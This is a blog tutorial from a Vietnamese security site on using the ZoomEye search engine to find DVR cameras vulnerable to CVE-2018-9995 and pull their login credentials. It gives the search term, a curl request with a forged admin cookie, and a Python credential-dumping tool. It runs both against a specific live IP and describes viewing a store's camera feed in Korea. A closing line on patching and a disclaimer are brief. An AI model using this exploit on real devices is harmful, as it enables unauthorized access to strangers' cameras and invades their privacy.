• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995

AnonyViet by AnonyViet
January 26, 2023
in Security
0

As in the previous post, I have About ZoomEye – Search engine for Hackers. Zoomeye is similar to Shodan but developed for the Chinese market. This is a search engine that just needs to enter an IP or a keyword, the results will show: open ports, related services, geographic location… Today we will try to practice using ZoomEye to find the items. Camera is vulnerable to CVE-2018-9995 and access to view that Camera.

Join the channel Telegram of the AnonyViet 👉 Link 👈

Find Cameras with CVE-2018-9995 Vulnerability Using ZoomEye

This is a security vulnerability discovered in 2018 related to Camera DVR recorders. With just a single command line, you can view the unencrypted Camera login account. Currently in the world there are many Camera receivers that have not been patched with this version, and we can easily find them using the ZoomEye tool.

Now we will practice with the ZoomEye search engine to find the camera with vulnerability CVE-2018-9995.

Open page ZoomEye and type login.rsp to find IPs associated with this keyword.

zoomeye hack camera

The result will be a list of IP addresses, click on the black arrow to access those addresses.

How to use zoomeye?

For example, we find the IP: http://59.18.152.180:9000. Now I will exploit the vulnerability to find the user/password to log into this Camera.

Using the Curl . command

Use the syntax:

curl "http://IP:Port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Open CMD and use the following command:

curl "http://59.18.152.180:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

hack camera CVE-2018-9995

There are results: UID: is the username, and pwd: is the password.

You open the browser Internet Explorer Go up, access the hacked IP camera to log in to the camera driver. Mind Enable ActiveX Please browse to see the image.

Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 4

And this is the Camera of a certain store, in Korea.

zoomeye camera

This is a python tool used to find the username/password of vulnerable cameras CVE-2018-9995. Therefore, it is required that you have Python installed on your computer. This tool can work on Windows.

You first Download Tool getDVR_Credentials. Extract to C: drive, open CMD to access the decompression path:

cd C:\CVE-2018-9995_dvr_credentials-dev_tool

pip install -r requirements

python getDVR_Credentials.py --host IP --port Port // IP and Port of Camera.

For the above example, we will type the command

python getDVR_Credentials.py --host 59.18.152.180 --port 9000

And this is the result:

hack camera CVE-2018-9995

How to fix vulnerability CVE-2018-9995: Change the login account and update the Camera to the latest Firmware.

When you find that the camera is flawed, try to notify the owner so they can contact a technician to handle it.

Although considered a “hacker-friendly” search engine, ZoomEye is not designed to initiate attacks on network devices or websites. The data recorded is for security research only. And this article is mainly for research purposes, please do not use it to break the law.

The article achieved: 5/5 – (100 votes)

Tags: CameraCVE20189995ExerciseHackVulnerableZoomEye
Previous Post

Lesson 56: How to create a search dialog box in Excel

Next Post

Top 11 Phần Mềm Quản Lý Công Việc Hiệu Quả Cho Doanh Nghiệp

AnonyViet

AnonyViet

Related Posts

How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Next Post
Top 11 Phần Mềm Quản Lý Công Việc Hiệu Quả Cho Doanh Nghiệp

Top 11 Phần Mềm Quản Lý Công Việc Hiệu Quả Cho Doanh Nghiệp

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Instructions on how to use Live Activities on MacOS 26

Instructions on how to use Live Activities on MacOS 26

August 30, 2025
Download Vietnamese Autoit self -study curriculum for the beginning

Download Vietnamese Autoit self -study curriculum for the beginning

August 29, 2025
How to view more time zones on Mac with multitimeinmenubar

How to view more time zones on Mac with multitimeinmenubar

August 29, 2025
How to link bank accounts to VnEID to receive social benefits

How to link bank accounts to VnEID to receive social benefits

August 28, 2025
Instructions on how to use Live Activities on MacOS 26

Instructions on how to use Live Activities on MacOS 26

August 30, 2025
Download Vietnamese Autoit self -study curriculum for the beginning

Download Vietnamese Autoit self -study curriculum for the beginning

August 29, 2025
How to view more time zones on Mac with multitimeinmenubar

How to view more time zones on Mac with multitimeinmenubar

August 29, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Instructions on how to use Live Activities on MacOS 26

Instructions on how to use Live Activities on MacOS 26

August 30, 2025
Download Vietnamese Autoit self -study curriculum for the beginning

Download Vietnamese Autoit self -study curriculum for the beginning

August 29, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply